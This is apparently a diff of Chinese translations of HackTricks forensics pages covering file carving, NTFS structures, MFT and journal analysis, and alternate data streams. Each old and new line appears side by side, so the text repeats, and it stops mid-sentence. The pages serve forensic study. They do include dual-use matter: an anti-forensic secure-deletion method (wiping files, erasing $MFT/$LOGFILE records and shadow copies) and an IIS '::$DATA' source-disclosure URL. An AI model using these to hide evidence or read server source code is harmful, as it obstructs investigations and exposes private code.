请注意,此技术**无法用于检索碎片化的文件**。如果文件**不存储在连续的扇区**中,那么这种技术将无法找到它或至少部分找到它
请注意,这种技术**无法检索碎片化的文件**。如果文件**未存储在连续的扇区中**,那么这种技术将无法找到它或至少是它的一部分
有几个工具可以用于文件切割,您可以指定要搜索的文件类型
有几种工具可以用于文件雕刻,指示您要搜索的文件类型
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### 数据流**切割**
### 数据流**雕刻**
数据流切割类似于文件切割,但**不是寻找完整的文件,而是寻找有趣的信息片段**。例如,不是寻找包含已记录的 URL 的完整文件,而是搜索 URL。
数据流雕刻与文件雕刻类似,但**不是寻找完整的文件,而是寻找有趣的信息片段**。\
例如不是寻找包含记录的URL的完整文件而是搜索URL。
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
@ -239,24 +243,25 @@ FAT允许的**最大文件大小为4GB**(减去一个字节),因为文件
### 安全删除
显然,有办法**“安全地”删除文件和与其相关的日志部分**。例如,可以多次使用垃圾数据覆盖文件的内容,然后从**$MFT**和**$LOGFILE**中**删除**有关文件的**日志**,并**删除卷影副本**。\
您可能会注意到,即使执行了该操作,仍然可能**记录文件存在的其他部分**,这是真实的,取证专业人员的工作之一就是找到它们。
显然,有方法可以**“安全地”删除文件和关于它们的日志部分**。例如,可以**多次用垃圾数据覆盖**文件的内容,然后**删除**来自**$MFT**和**$LOGFILE**的文件的**日志**,并**删除卷影副本**。\
您可能会注意到,即使执行了该操作,文件存在的其他部分可能仍然被记录下来,这是真的,取证专业人员的工作部分就是找到它们。
## 参考资料
* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm)
* [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html)
* [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service)
* **iHackLabs认证数字取证Windows**
* **iHackLabs Certified Digital Forensics Windows**
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击到高手通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* 你在一个**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
</details>
* 如果您想在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)上**关注**我。
* 通过向[**HackTricks**](https://github.com/c

241
forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
View file

@ -4,240 +4,183 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>从零开始学习AWS黑客攻击</strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>
## **NTFS**
**NTFS****新技术文件系统**)是由Microsoft开发的专有日志文件系统。
**NTFS****新技术文件系统**)是微软开发的专有日志文件系统。
在NTFS中簇是最小的大小单位,簇的大小取决于分区的大小。
簇是NTFS中最小的大小单位,簇的大小取决于分区的大小。
| 分区大小 | 每簇扇区数 | 簇大小 |
| ----------------------- | ---------- | -------- |
| 512MB或更小 | 1 | 512字节 |
| 513MB-1024MB1GB | 2 | 1KB |
| 1025MB-2048MB2GB | 4 | 2KB |
| 2049MB-4096MB4GB | 8 | 4KB |
| 4097MB-8192MB8GB | 16 | 8KB |
| 8193MB-16,384MB16GB | 32 | 16KB |
| 16,385MB-32,768MB32GB| 64 | 32KB |
| 大于32,768MB | 128 | 64KB |
| 分区大小 | 每簇扇区数 | 簇大小 |
| ------------------------ | ------- | -------- |
| 512MB或更小 | 1 | 512字节 |
| 513MB-1024MB (1GB) | 2 | 1KB |
| 1025MB-2048MB (2GB) | 4 | 2KB |
| 2049MB-4096MB (4GB) | 8 | 4KB |
| 4097MB-8192MB (8GB) | 16 | 8KB |
| 8193MB-16,384MB (16GB) | 32 | 16KB |
| 16,385MB-32,768MB (32GB) | 64 | 32KB |
| 超过32,768MB | 128 | 64KB |
### **闲置空间**
### **松弛空间**
由于NTFS的最小单位是**簇**,每个文件将占用多个完整的簇。因此,**每个文件占用的空间很可能比必要的空间多**。这些文件预留的**未使用空间**称为**闲置空间**,人们可以利用这个区域来**隐藏信息**。
由于NTFS中最小的大小单位是**簇**。每个文件将占用几个完整的簇。因此,**每个文件占用的空间很可能比必要的更多**。这些**未使用的**、被文件**预留**的空间称为**松弛空间**,人们可以利用这个区域来**隐藏信息**。
![](<../../../.gitbook/assets/image (498).png>)
### **NTFS引导扇区**
### **NTFS启动扇区**
你格式化一个NTFS卷时格式化程序会为引导元数据文件分配前16个扇区。第一个扇区是引导扇区包含“引导程序”代码接下来的15个扇区是引导扇区的IPL初始程序加载器。为了增加文件系统的可靠性NTFS分区的最后一个扇区包含引导扇区的备用副本。
您格式化NTFS卷时格式化程序会为启动元数据文件分配前16个扇区。第一个扇区是带有"引导"代码的启动扇区接下来的15个扇区是启动扇区的IPL初始程序加载器。为了提高文件系统的可靠性NTFS分区的最后一个扇区包含启动扇区的备份副本。
### **主文件表MFT**
NTFS文件系统包含一个称为主文件表MFT的文件。NTFS文件系统卷上至少有**一个MFT条目与每个文件对应**包括MFT本身。关于文件的所有信息,包括**大小、时间和日期戳、权限和数据内容**都存储在MFT条目或由MFT条目描述的MFT之外的空间中。
NTFS文件系统包含一个称为主文件表MFT的文件。NTFS文件系统卷上的每个文件包括MFT本身,至少有**一个MFT条目**。关于文件的所有信息,包括**大小、时间和日期戳、权限和数据内容**都存储在MFT条目中或由MFT条目描述的MFT外部空间中。
当文件被添加到NTFS文件系统卷时MFT中会添加更多的条目MFT的大小也会增加。当文件从NTFS文件系统卷中被删除时它们的MFT条目被标记为可重用。然而为这些条目分配的磁盘空间不会被重新分配MFT的大小不会减小。
随着**文件被添加**到NTFS文件系统卷MFT中添加了更多条目**MFT的大小增加**。当**文件**从NTFS文件系统卷中**删除**时,它们的**MFT条目被标记为可用**,并可能被重用。然而,已分配给这些条目的磁盘空间不会被重新分配MFT的大小不会减小。
NTFS文件系统为了尽可能地使MFT连续保留了MFT的空间。NTFS文件系统在每个卷中为MFT保留的空间称为**MFT区域**。文件和目录的空间也从这个空间中分配但只有在MFT区域之外的卷空间全部分配完之后才会分配
NTFS文件系统**保留空间给MFT以尽可能保持MFT的连续性**随着它的增长。NTFS文件系统为每个卷中的MFT保留的空间称为**MFT区域**。文件和目录的空间也从这个空间分配但只有在MFT区域外的所有卷空间都被分配后才会这样做
根据平均文件大小和其他变量的不同,**在磁盘填满容量时可能会首先分配保留的MFT区域或磁盘上的未保留空间**。具有相对较大文件数量的卷会首先分配未保留空间而具有相对较小文件数量的卷会首先分配MFT区域。在任一情况下当其中一个区域完全分配时MFT的碎片化就开始发生。如果未保留空间完全分配用户文件和目录的空间将从MFT区域分配。如果MFT区域完全分配新的MFT条目的空间将从未保留空间分配。
根据平均文件大小和其他变量**随着磁盘填满可能首先分配保留的MFT区域或未保留的磁盘空间**。具有少量相对较大文件的卷将首先分配未保留的空间而具有大量相对较小文件的卷首先分配MFT区域。在任何一种情况下当一个区域或另一个区域被完全分配时MFT的碎片化开始发生。如果未保留的空间完全分配用户文件和目录的空间将从MFT区域分配。如果MFT区域完全分配新的MFT条目的空间将从未保留空间分配。
NTFS文件系统还生成一个**$MFTMirror**。这是MFT的**前4个条目的副本**$MFT、$MFT Mirror、$Log、$Volume。
NTFS文件系统还生成一个**$MFTMirror**。这是MFT的**前4个条目的副本**$MFT、$MFT Mirror、$Log、$Volume。
NTFS为表的前16个记录保留了特殊信息:
NTFS为表中的前16条记录保留了特殊信息:
| 系统文件 | 文件名 | MFT记录 | 文件的目的 |
| -------------------- | --------- | -------- | ----------------------------------------------------------------------------------------------- |
| 主文件表 | $Mft | 0 | 包含NTFS卷上每个文件和文件夹的一个基本文件记录。如果一个文件或文件夹的分配信息太大,无法适应单个记录中,将分配其他文件记录。 |
| 主文件表2 | $MftMirr | 1 | MFT的前四个记录的重复镜像。这个文件在单个扇区故障的情况下保证对MFT的访问。 |
| 日志文件 | $LogFile | 2 | 包含用于NTFS可恢复性的事务步骤列表。日志文件的大小取决于卷的大小最大可以达到4MB。它被Windows NT/2000用于在系统故障后恢复NTFS的一致性。 |
| 卷 | $Volume | 3 | 包含有关卷的信息,如卷标和卷版本。 |
| 属性定义 | $AttrDef | 4 | 属性名称、编号和描述的表。 |
| 根文件名索引 | $ | 5 | 根文件夹。 |
| 簇位图 | $Bitmap | 6 | 表示卷中哪些簇正在使用的表示。 |
| 引导扇区 | $Boot | 7 | 包含用于挂载卷的BPB以及如果卷可引导则使用的附加引导加载程序代码。 |
| 坏簇文件 | $BadClus | 8 | 包含卷的坏簇。 |
| 安全文件 | $Secure | 9 | 包含卷内所有文件的唯一安全描述符。 |
| 大写表 | $Upcase | 10 | 将小写字符转换为相应的Unicode大写字符。 |
| NTFS扩展文件 | $Extend | 11 | 用于各种可选扩展,如配额、重解析点数据和对象标识符。 |
| | | 12-15 | 保留供将来使用。 |
| 配额管理文件 | $Quota | 24 | 包含用户分配的卷空间配额限制。 |
| 对象ID文件 | $ObjId | 25 | 包含文件对象ID。 |
| 重解析点文件 | $Reparse | 26 | 此文件包含有关卷上文件和文件夹的信息,包括重解析点数据。 |
| 系统文件 | 文件名 | MFT记录 | 文件用途 |
| --------------------- | --------- | ---- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 主文件表 | $Mft | 0 | 包含NTFS卷上每个文件和文件夹的一个基本文件记录。如果文件或文件夹的分配信息太大而无法适应单个记录,则会分配其他文件记录。 |
| 主文件表2 | $MftMirr | 1 | MFT前四条记录的副本图像。这个文件保证了在单个扇区故障的情况下能够访问MFT。 |
| 日志文件 | $LogFile | 2 | 包含用于NTFS可恢复性的事务步骤列表。日志文件的大小取决于卷的大小最大可达4MB。它被Windows NT/2000用来在系统故障后恢复NTFS的一致性。 |
| 卷 | $Volume | 3 | 包含有关卷的信息,如卷标和卷版本。 |
| 属性定义 | $AttrDef | 4 | 属性名称、编号和描述的表 |
| 根文件名索引 | $ | 5 | 根文件夹。 |
| 簇位图 | $Bitmap | 6 | 显示哪些簇正在使用的卷的表示。 |
| 启动扇区 | $Boot | 7 | 包括用于挂载卷的BPB和额外的引导加载器代码如果卷是可启动的 |
| 坏簇文件 | $BadClus | 8 | 包含卷的坏簇。 |
| 安全文件 | $Secure | 9 | 包含卷内所有文件的唯一安全描述符。 |
| 大写表 | $Upcase | 10 | 将小写字符转换为匹配的Unicode大写字符。 |
| NTFS扩展文件 | $Extend | 11 | 用于各种可选扩展,如配额、重解析点数据和对象标识符。 |
| | | 12-15 | 保留供将来使用。 |
| 配额管理文件 | $Quota | 24 | 包含用户在卷空间上分配的配额限制。 |
| 对象ID文件 | $ObjId | 25 | 包含文件对象ID。 |
| 重解析点文件 | $Reparse | 26 | 包含有关卷上文件和文件夹的信息,包括重解析点数据。 |
### MFT的每个条目如下所示
![](<../../../.gitbook/assets/image (499).png>)
请注意,每个条目以"FILE"开头。每个条目占用1024位。因此在MFT条目的开头后的1024位之后您将找到下一个条目
注意每个条目都是以"FILE"开头的。每个条目占用1024位。所以从一个MFT条目的开始后1024位你会找到下一个
使用[**Active Disk Editor**](https://www.disk-editor.org/index.html)非常容易检查MFT中文件的条目。只需右键单击文件然后单击"Inspect File Record"。
使用[**Active Disk Editor**](https://www.disk-editor.org/index.html)可以很容易地检查MFT中文件的条目。只需右键点击文件然后点击"Inspect File Record"
![](<../../../.gitbook/assets/image (500).png>)
![](<../../../.gitbook/assets/image (501).png>)
通过检查**"In use"**标志,可以很容易地知道文件是否已删除(值为**0x0表示已删除**)。
检查**"In use"**标志可以很容易地知道文件是否被删除(**0x0表示已删除**)。
![](<../../../.gitbook/assets/image (510).png>)
可以使用FTKImager恢复已删除的文件
可以使用FTKImager恢复已删除的文件
![](<../../../.gitbook/assets/image (502).png>)
### MFT属性
每个MFT条目都有个属性,如下图所示:
每个MFT条目都有个属性,如下图所示:
![](<../../../.gitbook/assets/image (506).png>)
每个属性都表示某些由类型标识符标识的条目信息:
每个属性通过类型标识符指示一些条目信息:
| 类型标识符 | 名称 | 描述 |
| ---------- | ------------------------ | ---------------------------------------------------------------------------------------------------------------- |
| 16 | $STANDARD\_INFORMATION | 一般信息如标志最后访问、写入和创建时间所有者和安全ID。 |
| 32 | $ATTRIBUTE\_LIST | 文件的其他属性所在的列表。 |
| 48 | $FILE\_NAME | 文件名以Unicode表示以及最后访问、写入和创建时间。 |
| 64 | $VOLUME\_VERSION | 卷信息。仅存在于版本1.2Windows NT。 |
| 64 | $OBJECT\_ID | 文件或目录的16字节唯一标识符。仅存在于版本3.0+和之后Windows 2000+)。 |
| 80 | $SECURITY\_ DESCRIPTOR | 文件的访问控制和安全属性。 |
| 96 | $VOLUME\_NAME | 卷名称。 |
| 112 | $VOLUME\_ INFORMATION | 文件系统版本和其他标志。 |
| 128 | $DATA | 文件内容。 |
| 144 | $INDEX\_ROOT | 索引树的根节点。 |
| 160 | $INDEX\_ALLOCATION | 以$INDEX\_ROOT属性为根的索引树的节点。 |
| 176 | $BITMAP | 用于$MFT文件和索引的位图。 |
| 192 | $SYMBOLIC\_LINK | 软链接信息。仅存在于版本1.2Windows NT。 |
| 192 | $REPARSE\_POINT | 包含有关重解析点的数据,用作版本3.0+Windows 2000+)中的软链接。 |
| 208 | $EA\_INFORMATION | 用于与OS/2应用程序HPFS向后兼容。 |
| 224 | $EA | 用于与OS/2应用程序HPFS向后兼容。 |
| 256 | $LOGGED\_UTILITY\_STREAM | 包含版本3.0+Windows 2000+)中加密属性的键和信息。 |
| 类型标识符 | 名称 | 描述 |
| ------- | ------------------------ | -------------------------------------------------------------------------------------------------------- |
| 16 | $STANDARD\_INFORMATION | 一般信息,如标志;最后访问、写入和创建时间;以及所有者和安全ID。 |
| 32 | $ATTRIBUTE\_LIST | 列出文件的其他属性可以在哪里找到。 |
| 48 | $FILE\_NAME | 以Unicode格式的文件名以及最后访问、写入和创建时间。 |
| 64 | $VOLUME\_VERSION | 卷信息。只存在于版本1.2Windows NT。 |
| 64 | $OBJECT\_ID | 一个16字节的文件或目录唯一标识符。只存在于版本3.0+之后Windows 2000+)。 |
| 80 | $SECURITY\_ DESCRIPTOR | 文件的访问控制和安全属性。 |
| 96 | $VOLUME\_NAME | 卷名称。 |
| 112 | $VOLUME\_ INFORMATION | 文件系统版本和其他标志。 |
| 128 | $DATA | 文件内容。 |
| 144 | $INDEX\_ROOT | 索引树的根节点。 |
| 160 | $INDEX\_ALLOCATION | 根植于$INDEX\_ROOT属性的索引树的节点。 |
| 176 | $BITMAP | $MFT文件和索引的位图。 |
| 192 | $SYMBOLIC\_LINK | 软链接信息。只存在于版本1.2Windows NT。 |
| 192 | $REPARSE\_POINT | 包含有关重解析点的数据,这在版本3.0+Windows 2000+)中用作软链接。 |
| 208 | $EA\_INFORMATION | 用于与OS/2应用程序HPFS向后兼容。 |
| 224 | $EA | 用于与OS/2应用程序HPFS向后兼容。 |
| 256 | $LOGGED\_UTILITY\_STREAM | 包含有关版本3.0+Windows 2000+)中加密属性的密钥和信息。 |
例如,**类型480x30**标识**文件名**
例如,**类型48 (0x30)** 标识**文件名**
![](<../../../.gitbook/assets/image (508).png>)
还有一点很有用,就是**这些属性可以是驻留的**意味着它们存在于给定的MFT记录中或者是**非驻留的**意味着它们存在于磁盘上的MFT记录之外的其他位置并且仅在记录中引用。例如如果属性**$Data是驻留的**,这意味着**整个文件保存在MFT中**,如果是非驻留的,则文件的内容在文件系统的其他部分。
了解这些属性可以是常驻的意味着它们存在于给定的MFT记录中或非常驻的意味着它们存在于给定MFT记录之外的磁盘上的其他地方并且仅在记录中被引用也很有用。例如如果属性**$Data是常驻的**,这意味着**整个文件保存在MFT中**,如果它是非常驻的,那么文件的内容在文件系统的另一个部分。
一些有趣的属性:
* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html)以及其他
* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html)其中包括
* 创建日期
* 修改日期
* 访问日期
* MFT更新日期
* DOS文件权限
* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html)以及其他
* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html)其中包括
* 文件名
* 创建日期
* 修改日期
* 访问日期
* MFT更新日期
* 分配大小
* 分配大小
* 实际大小
* [文件引用](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html)指向父目录。
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html)以及其他
* 包含文件的数据或数据所在扇区的指示。在下面的示例中,属性数据不是驻留的,因此属性提供了有关数据所在扇区的信息。
* [文件引用](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html)父目录。
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html)其中包括
* 包含文件数据或指示数据所在扇区的信息。在以下示例中,数据属性不是常驻的,所以属性提供了有关数据所在扇区的信息。
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
![](<../../../.gitbook/assets/image (509).png>)
### NTFS时间戳
![](<../../../.gitbook/assets/image (512).png>)
分析MFT的另一个有用工具是[MFT2csv](https://github.com/jschicht/Mft2Csv)选择mft文件或镜像按下dump all and extract以提取所有对象)。\
该程序将以CSV格式提取所有MFT数据并呈现出来。它还可以用于转储文件。
分析MFT的另一个有用工具是[**MFT2csv**](https://github.com/jschicht/Mft2Csv)选择mft文件或映像并按下dump all并提取以提取所有对象)。\
这个程序将提取所有MFT数据并以CSV格式呈现。它也可以用来转储文件。
![](<../../../.gitbook/assets/image (513).png>)
### $LOGFILE
文件**`$LOGFILE`**包含有关对文件执行的操作的日志。它还保存了在发生错误时需要执行的操作以及返回到先前状态所需的操作。\
这些日志对于MFT在发生某种错误时重建文件系统很有用。此文件的最大大小为**65536KB**。
文件**`$LOGFILE`**包含了对**文件执行的操作**的**日志**。它还**保存**了在**重做**的情况下需要执行的**操作**,以及需要执行的操作以**返回**到**之前的状态**。\
这些日志对于MFT在发生某种错误时重建文件系统很有用。这个文件的最大大小是**65536KB**。
要检查`$LOGFILE`,您需要先使用[MFT2csv](https://github.com/jschicht/Mft2Csv)提取并检查`$MFT`。\
然后运行[LogFileParser](https://github.com/jschicht/LogFileParser)对该文件进行操作,并选择导出的`$LOGFILE`文件和`$MFT`检查的CSV文件。您将获得一个包含由`$LOGFILE`日志记录的文件系统活动日志的CSV文件
要检查`$LOGFILE`,您需要先用[**MFT2csv**](https://github.com/jschicht/Mft2Csv)提取并检查`$MFT`。\
然后运行[**LogFileParser**](https://github.com/jschicht/LogFileParser)针对这个文件,并选择导出的`$LOGFILE`文件和`$MFT`检查的CVS。您将获得一个CSV文件其中记录了`$LOGFILE`日志记录的文件系统活动
![](<../../../.gitbook/assets/image (515).png>)
通过文件名过滤,您可以看**对文件执行的所有操作**
通过文件名过滤,您可以看**对文件执行的所有操作**
![](<../../../.gitbook/assets/image (514).png>)
### $USNJnrl
文件`$EXTEND/$USNJnrl/$J`是文件`$EXTEND$USNJnrl`的备用数据流。此工件包含比`$LOGFILE`更详细的NTFS卷内更改的注册表
文件`$EXTEND/$USNJnrl/$J`是文件`$EXTEND$USNJnrl`的一个备用数据流。这个工件包含了一个**记录NTFS卷内变化的注册表比`$LOGFILE`更详细**
要检查此文件,您可以使用工具[UsnJrnl2csv](https://github.com/jschicht/UsnJrnl2Csv)。
要检查这个文件,您可以使用工具[**UsnJrnl2csv**](https://github.com/jschicht/UsnJrnl2Csv)。
通过文件名过滤,可以查看**针对文件执行的所有操作**。此外,您还可以在父文件夹中找到`MFTReference`。然后查看该`MFTReference`,您可以找到来自父文件夹的信息。
![](<../../../.gitbook/assets/image (516).png>)
### $I30
文件系统中的每个**目录**都包含一个必须在目录内容发生更改时维护的**`$I30`属性**。当文件或文件夹从目录中删除时,`$I30`索引记录将相应重新排列。然而,**重新排列索引记录可能会在未使用的空间中留下已删除的文件/文件夹条目的残留**。这对于鉴定可能存在于驱动器上的文件在取证分析中很有用。
您可以使用**FTK Imager**获取目录的`$I30`文件,并使用工具[Indx2Csv](https://github.com/jschicht/Indx2Csv)进行检查。
![](<../../../.gitbook/assets/image (519).png>)
通过这些数据,您可以找到**在文件夹内执行的文件更改的信息**,但请注意,文件的删除时间不会保存在此日志中。但是,您可以查看**`$I30`文件**的**最后修改日期**,如果对目录执行的**最后一个操作**是文件的**删除**,则时间可能相同。
### $Bitmap
**`$BitMap`**是NTFS文件系统中的一个特殊文件。该文件跟踪NTFS卷上所有已使用和未使用的簇。当文件占用NTFS卷上的空间时所使用的位置将在`$BitMap`中标记出来。
![](<../../../.gitbook/assets/image (523).png>)
### ADS备用数据流
备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中默认数据流称为`:$DATA`。\
在此[页面上,您可以查看有关如何在控制台中创建/访问/发现备用数据流](../../../windows-hardening/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream)的不同方法。过去这在IIS中导致了一个漏洞因为人们可以通过访问`:$DATA`流(如`http://www.alternate-data-streams.com/default.asp::$DATA`)来访问页面的源代码。
使用工具[AlternateStreamView](https://www.nirsoft.net/utils/alternate\_data\_streams.html)您可以搜索和导出所有带有某些ADS的文件。
![](<../../../.gitbook/assets/image (518).png>)
使用FTK Imager并双击带有ADS的文件您可以**访问ADS数据**
![](<../../../.gitbook/assets/image (517).png>)
如果您找到名为**`Zone.Identifier`**的ADS请参见上图通常会包含有关文件下载方式的信息。其中将有一个名为"ZoneId"的字段,其中包含以下信息:
* Zone ID = 0 -> Mycomputer
* Zone ID = 1 -> Intranet
* Zone ID = 2 -> Trusted
* Zone ID = 3 -> Internet
* Zone ID = 4 -> Untrusted
此外,不同的软件可能存储其他信息:
| 软件 | 信息 |
| ------------------------------------------------------------------ | ---------------------------------------------------------------------------- |
| Google Chrome, Opera, Vivaldi, | ZoneId=3, ReferrerUrl, HostUrl |
| Microsoft Edge | ZoneId=3, LastWriterPackageFamilyName=Microsoft.MicrosoftEdge\_8wekyb3d8bbwe |
| Firefox, Tor browser, Outlook2016, Thunderbird, Windows Mail, Skype | ZoneId=3 |
| μTorrent | ZoneId=3, HostUrl=about:internet |
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的**公司广告**吗或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks衣物**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) **或者** [**telegram 群组**](https://t.me/peass) **或者在 Twitter 上关注我** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
</details>
通过文件名过滤,可以看到**对文件执行的所有操作**。此外,您可以找到

200
forensics/basic-forensic-methodology/pcap-inspection/README.md
View file

@ -1,52 +1,54 @@
# Pcap检查
# Pcap 检查
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习 AWS 黑客技术,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
